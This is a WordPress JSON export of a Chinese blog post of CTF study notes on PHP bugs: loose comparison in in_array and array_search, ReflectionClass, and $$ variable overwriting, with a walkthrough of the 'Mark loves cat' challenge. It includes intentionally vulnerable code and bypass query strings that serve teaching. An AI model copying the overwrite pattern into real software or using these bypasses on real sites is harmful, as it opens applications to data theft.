\u51fd\u6570\u5728\u6570\u7ec4\u4e2d\u641c\u7d22\u67d0\u4e2a\u952e\u503c\uff0c\u5e76\u8fd4\u56de\u5bf9\u5e94\u7684\u952e\u540d\u3002in_array() \u51fd\u6570\u641c\u7d22\u6570\u7ec4\u4e2d\u662f\u5426\u5b58\u5728\u6307\u5b9a\u7684\u503c\u3002\u57fa\u672c\u529f\u80fd\u662f\u76f8\u540c\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u7ed5\u8fc7\u59ff\u52bf\u4e5f\u76f8\u540c\u3002Array\u7cfb\u5217\u6709\u4e24\u79cd\u5b89\u5168\u95ee\u9898\uff0c\u4e00\u79cd\u662f\u6b63\u5e38\u7684\u6570\u7ec4\u7ed5\u8fc7\uff0c\u4e00\u79cd\u662f\u201c= =\u201d\u53f7\u95ee\u9898\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">in_array<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">$allow = array(1,'2','3');<br>var_dump(in_array('1.php',$allow));<br>\u8fd4\u56de\u7684\u4e3atrue<br>\u200b<br>$allow = array('1','2','3');<br>var_dump(in_array('1.php',$allow));<br>\u8fd4\u56defalse<\/pre>\n\n\n\n<p><code>in_array()<\/code>\u7684\u7279\u6027\uff0c\u5f31\u6bd4\u8f83\u7279\u6027\uff0c<code>'1.php'==1<\/code>\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$array=[0,1,2,'3'];<br>var_dump(in_array('abc', $array)); &nbsp;\/\/true \u201cabc\u201d==0<br>var_dump(in_array('1bc', $array)); &nbsp;\/\/true \u201c1bc\u201d==1<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">array_search<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>if(!is_array($_GET['test'])){exit();}<br>$test=$_GET['test'];<br>for($i=0;$i&lt;count($test);$i++){<br> &nbsp; &nbsp;if($test[$i]===\"admin\"){<br> &nbsp; &nbsp; &nbsp; &nbsp;echo \"error\";<br> &nbsp; &nbsp; &nbsp; &nbsp;exit();<br> &nbsp;  }<br> &nbsp; &nbsp;$test[$i]=intval($test[$i]);<br>}<br>if(array_search(\"admin\",$test)===0){<br> &nbsp; &nbsp;echo \"flag\";<br>}<br>else{<br> &nbsp; &nbsp;echo \"false\";<br>}<br>?&gt;<\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u8fd9\u6bb5\u4ee3\u7801\u7684\u610f\u601d\u5c31\u662f\u5148\u5224\u65ad\u662f\u4e0d\u662f\u6570\u7ec4\uff0c\u7136\u540e\u5728\u628a\u6570\u7ec4\u4e2d\u7684\u5185\u5bb9\u4e00\u4e2a\u4e2a\u8fdb\u884c\u904d\u5386\uff0c\u6240\u6709\u5185\u5bb9\u90fd\u4e0d\u80fd\u7b49\u4e8eadmin,\u7c7b\u578b\u4e5f\u5fc5\u987b\u76f8\u540c\uff0c\u7136\u540e\u8f6c\u5316\u6210int\u578b\uff0c\u7136\u540e\u518d\u8fdb\u884c\u6bd4\u8f83\u5982\u679c\u586b\u5165\u503c\u4e0eadmin\u76f8\u540c\uff0c\u5219\u8fd4\u56deflag<\/p><\/blockquote>\n\n\n\n<p>\u57fa\u672c\u601d\u8def\u8fd8\u662f\u4e0d\u53d8\uff0c\u56e0\u4e3a\u7528\u7684\u662f\u4e09\u4e2a\u7b49\u4e8e\u53f7\uff0c\u6240\u4ee5\u8bf4\u201c= =\u201d\u53f7\u8fd9\u4e2a\u65b9\u6cd5\u57fa\u672c\u4e0d\u80fd\u7528\uff0c\u90a3\u5c31\u7528\u7b2c\u4e8c\u6761\u601d\u8def\uff0c\u5229\u7528\u51fd\u6570\u63a5\u5165\u5230\u4e86\u4e0d\u7b26\u5408\u7684\u7c7b\u578b\u8fd4\u56de\u201c0\u201d\u8fd9\u4e2a\u7279\u6027\uff0c\u76f4\u63a5\u7ed5\u8fc7\u68c0\u6d4b\u3002\u6240\u4ee5payload\uff1atest[]=0\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cd\u5c04\u7c7bReflectionClass<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class A{<br>public static $flag=\"flag{123123123}\";<br>const &nbsp;PI=3.14;<br>static function hello(){<br> &nbsp; &nbsp;echo \"hello&lt;\/br&gt;\";<br>}<br>}<br>$a=new ReflectionClass('A');<br>\u200b<br>\u200b<br>var_dump($a-&gt;getConstants()); &nbsp;\u83b7\u53d6\u4e00\u7ec4\u5e38\u91cf<br>\u8f93\u51fa<br> array(1) {<br>  [\"PI\"]=&gt;<br> &nbsp;float(3.14)<br>}<br>\u200b<br>var_dump($a-&gt;getName()); &nbsp; &nbsp;\u83b7\u53d6\u7c7b\u540d<br>\u8f93\u51fa<br>string(1) \"A\"<br>\u200b<br>var_dump($a-&gt;getStaticProperties()); \u83b7\u53d6\u9759\u6001\u5c5e\u6027<br>\u8f93\u51fa<br>array(1) {<br>  [\"flag\"]=&gt;<br> &nbsp;string(15) \"flag{123123123}\"<br>}<br>\u200b<br>var_dump($a-&gt;getMethods()); \u83b7\u53d6\u7c7b\u4e2d\u7684\u65b9\u6cd5<br>\u8f93\u51fa<br>array(1) {<br>  [0]=&gt;<br> &nbsp;object(ReflectionMethod)#2 (2) {<br> &nbsp;  [\"name\"]=&gt;<br> &nbsp; &nbsp;string(5) \"hello\"<br> &nbsp;  [\"class\"]=&gt;<br> &nbsp; &nbsp;string(1) \"A\"<br>  }<br>}<br>\u200b<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">php\u53d8\u91cf\u8986\u76d6($$)<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>$$\u4ecb\u7ecd<\/strong><\/h3>\n\n\n\n<p>$$\u8fd9\u79cd\u5199\u6cd5\u79f0\u4e3a\u53ef\u53d8\u53d8\u91cf \u4e00\u4e2a\u53ef\u53d8\u53d8\u91cf\u83b7\u53d6\u4e86\u4e00\u4e2a\u666e\u901a\u53d8\u91cf\u7684\u503c\u4f5c\u4e3a\u8fd9\u4e2a\u53ef\u53d8\u53d8\u91cf\u7684\u53d8\u91cf\u540d\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>$a = \"hello\";<br>echo \"$a\"; \/\/\u8f93\u51fahello<br>$a = \"world\";<br>echo \"$$a\"; \/\/\u8f93\u51fa$world<br>?&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u6f0f\u6d1e\u4ea7\u751f<\/strong><\/h3>\n\n\n\n<p>\u4f7f\u7528foreach\u6765\u904d\u5386\u6570\u7ec4\u4e2d\u7684\u503c\uff0c\u7136\u540e\u518d\u5c06\u83b7\u53d6\u5230\u7684\u6570\u7ec4\u952e\u540d\u4f5c\u4e3a\u53d8\u91cf\uff0c\u6570\u7ec4\u4e2d\u7684\u952e\u503c\u4f5c\u4e3a\u53d8\u91cf\u7684\u503c\u3002\u56e0\u6b64\u5c31\u4ea7\u751f\u4e86\u53d8\u91cf\u8986\u76d6\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>$a = \"hello\";<br>foreach ($_GET as $key =&gt; $value) {<br>${$key} = $value;<br>}<br>echo $a; \/\/\u8f93\u51fa\u6839\u636eget\u4f20\u5165\u7684\u53c2\u6570\u800c\u5b9a\uff0c\u9020\u6210\u8986\u76d6<br>?&gt;<\/code><\/pre>\n\n\n\n<p>get\u5f97\u5230\u7684\u6570\u636e$key\u548c$value,\u5173\u952e\u7b2c3\u884c,${$key}\u7528get\u4f20\u8fdb\u6765\u7684$key\u505a\u4e3a\u65b0\u7684\u53d8\u91cf,\u5c06get\u4f20\u8fdb\u6765\u7684$value\u8d4b\u503c\u7ed9\u5b83\u3002 get <code>?a=1<\/code> \u7b2c4\u884c\u56de\u89e3\u6790\u4e3a$a=1\u3002\u5c31\u9020\u6210\u4e86\u53d8\u91cf\u8986\u76d6\uff0c\u6700\u540e\u8f93\u51fa1<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4f8b\u9898<\/h3>\n\n\n\n<p><code>[BJDCTF2020]Mark loves cat<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>include 'flag.php';<br>\u200b<br>$yds = \"dog\";<br>$is = \"cat\";<br>$handsome = 'yds';<br>\u200b<br>foreach($_POST as $x =&gt; $y){<br> &nbsp; &nbsp;$$x = $y;<br>}<br>\u200b<br>foreach($_GET as $x =&gt; $y){<br> &nbsp; &nbsp;$$x = $$y;<br>}<br>\u200b<br>foreach($_GET as $x =&gt; $y){<br> &nbsp; &nbsp;if($_GET&#91;'flag'] === $x &amp;&amp; $x !== 'flag'){<br> &nbsp; &nbsp; &nbsp; &nbsp;exit($handsome);<br> &nbsp;  }<br>}<br>\u200b<br>if(!isset($_GET&#91;'flag']) &amp;&amp; !isset($_POST&#91;'flag'])){<br> &nbsp; &nbsp;exit($yds);<br>}<br>\u200b<br>if($_POST&#91;'flag'] === 'flag' &nbsp;|| $_GET&#91;'flag'] === 'flag'){<br> &nbsp; &nbsp;exit($is);<br>}<\/code><\/pre>\n\n\n\n<p>1\u3001\u524d\u4e24\u4e2a<code>foreach<\/code>\u8bed\u53e5\u5206\u522b\u5c06<code>POST<\/code>\u53c2\u6570\u548c<code>GET<\/code>\u53c2\u6570\u8fdb\u884c\u53d8\u91cf\u8986\u76d6\uff0c\u63a5\u7740\u662f\u4e09\u4e2aif\u8bed\u53e5\uff0c<code>exit()<\/code>\u51fd\u6570\u9000\u51fa\u811a\u672c\u7684\u540c\u65f6\u8f93\u51fa\u53d8\u91cf\uff0c\u6700\u540e\u4e00\u53e5\u662f\u8f93\u51fa\u6211\u4eec\u60f3\u8981\u7684flag\u3002<\/p>\n\n\n\n<p>2\u3001\u9996\u5148\u6211\u4eec\u60f3\u5230\u7684\u662f\u8ba9\u811a\u672c\u6267\u884c\u5230\u6700\u540e\u4e00\u53e5<code>echo $flag;<\/code>\uff0c\u4f46\u5373\u4f7f\u7ed5\u8fc7\u4e09\u4e2aif\u8bed\u53e5\uff0c\u6211\u4eec<code>GET<\/code>\u4f20\u53c2\u6216\u8005<code>POST<\/code>\u4f20\u53c2\u7684flag\u603b\u4f1a\u88ab\u53d8\u91cf\u8986\u76d6\uff1a\u5982\u6211\u4eec<code>GET<\/code>\u4f20\u53c2flag=aaa\uff0c\u5728\u7b2c\u4e8c\u4e2aforeach\u8bed\u53e5\u4e2d\u53d8\u6210<code>$flag<\/code> = <code>$aaa<\/code>\uff0c\u800c<code>$aaa<\/code>\u53d8\u91cf\u6ca1\u6709\u5b9a\u4e49\u4e3a\u7a7a\uff0c\u6700\u540e\u7684\u8f93\u51fa\u5c31\u662f\u7a7a\u3002\u540c\u7406<code>POST<\/code>\u4f20\u53c2flag=aaa\uff0c\u5728\u7b2c\u4e00\u4e2aforeach\u8bed\u53e5\u4e2d\u53d8\u6210<code>$flag<\/code> = aaa\uff0cflag\u4f1a\u88ab\u8986\u76d6\u6210aaa\uff0c\u6700\u540e\u8f93\u51faaaa\u3002<\/p>\n\n\n\n<p>3\u3001if\u8bed\u53e5\u4e2d\u7684<code>exit()<\/code>\u51fd\u6570\u867d\u7136\u4f1a\u9000\u51fa\u6267\u884c\uff0c\u4f46\u4e5f\u4f1a\u8f93\u51fa\u5176\u53c2\u6570\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u53d8\u91cf\u8986\u76d6\u5c06<code>exit()<\/code>\u51fd\u6570\u5185\u7684\u53c2\u6570\u7528<code>$flag<\/code>\u8986\u76d6\u6389\u5c31\u80fd\u8f93\u51faflag\u4e86<\/p>\n\n\n\n<p>\u65b9\u6cd5\u4e00\uff1a<\/p>\n\n\n\n<p>\u5229\u7528<code>$yds<\/code>\u8f93\u51fa\u3002<\/p>\n\n\n\n<p>\u7b2c\u4e8c\u4e2aif\u8bed\u53e5\u53ea\u9700\u4e0d\u5b58\u5728get\u548cpost\u578bflag\u53c2\u6570\u5373\u53ef<\/p>\n\n\n\n<p>\u90a3\u4e48\u901a\u8fc7get\u4f20\u5165<code>?yds=flag<\/code>\uff0c\u901a\u8fc7\u7b2c\u4e8c\u4e2aforeach\u8bed\u53e5\u53d8\u6210<code>$yds=$flag<\/code>\uff0c\u5b8c\u6210\u8986\u76d6\uff0c\u8f93\u51fa<code>$yds<\/code>\u5373\u8f93\u51fa<code>$flag<\/code><\/p>\n\n\n\n<p>\u65b9\u6cd5\u4e8c\uff1a<\/p>\n\n\n\n<p>\u5229\u7528<code>$is<\/code>\u8f93\u51fa<\/p>\n\n\n\n<p>\u901a\u8fc7get\u4f20\u5165<code>?is=flag&amp;flag=flag<\/code>\uff0c\u524d\u9762\u7684\u8fbe\u5230<code>$is<\/code>=<code>$flag<\/code>\u8986\u76d6\u7684\u76ee\u7684\uff0c\u540e\u9762\u7684\u53ea\u4e3a\u4e86\u6ee1\u8db3if\u8bed\u53e5\u3002<\/p>\n\n\n\n<p>\u800cpost\u7684\u8bdd\u5b8c\u6210\u4e0d\u4e86\uff0c\u5982\u679cpost\u4f20\u5165<code>flag=flag<\/code>\uff0c\u4f20\u5165\u540e\u53d8\u6210<code>$flag=flag<\/code>\uff0c\u539f\u6765\u7684flag\u503c\u4f1a\u88ab\u8986\u76d6\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>PHP intval() \u51fd\u6570 \u57fa\u672c\u7c7b\u578b intval() \u51fd\u6570\u7528\u4e8e\u83b7\u53d6\u53d8\u91cf\u7684\u6574\u6570\u503c\u3002 intval() \u51fd\u6570 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[16],"_links":{"self":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/218"}],"collection":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=218"}],"version-history":[{"count":5,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/218\/revisions"}],"predecessor-version":[{"id":257,"href":"http:\/\/101.34.19.194\/index.php?rest_route=\/wp\/v2\/posts\/218\/revisions\/257"}],"wp:attachment":[{"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=218"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=218"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.34.19.194\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}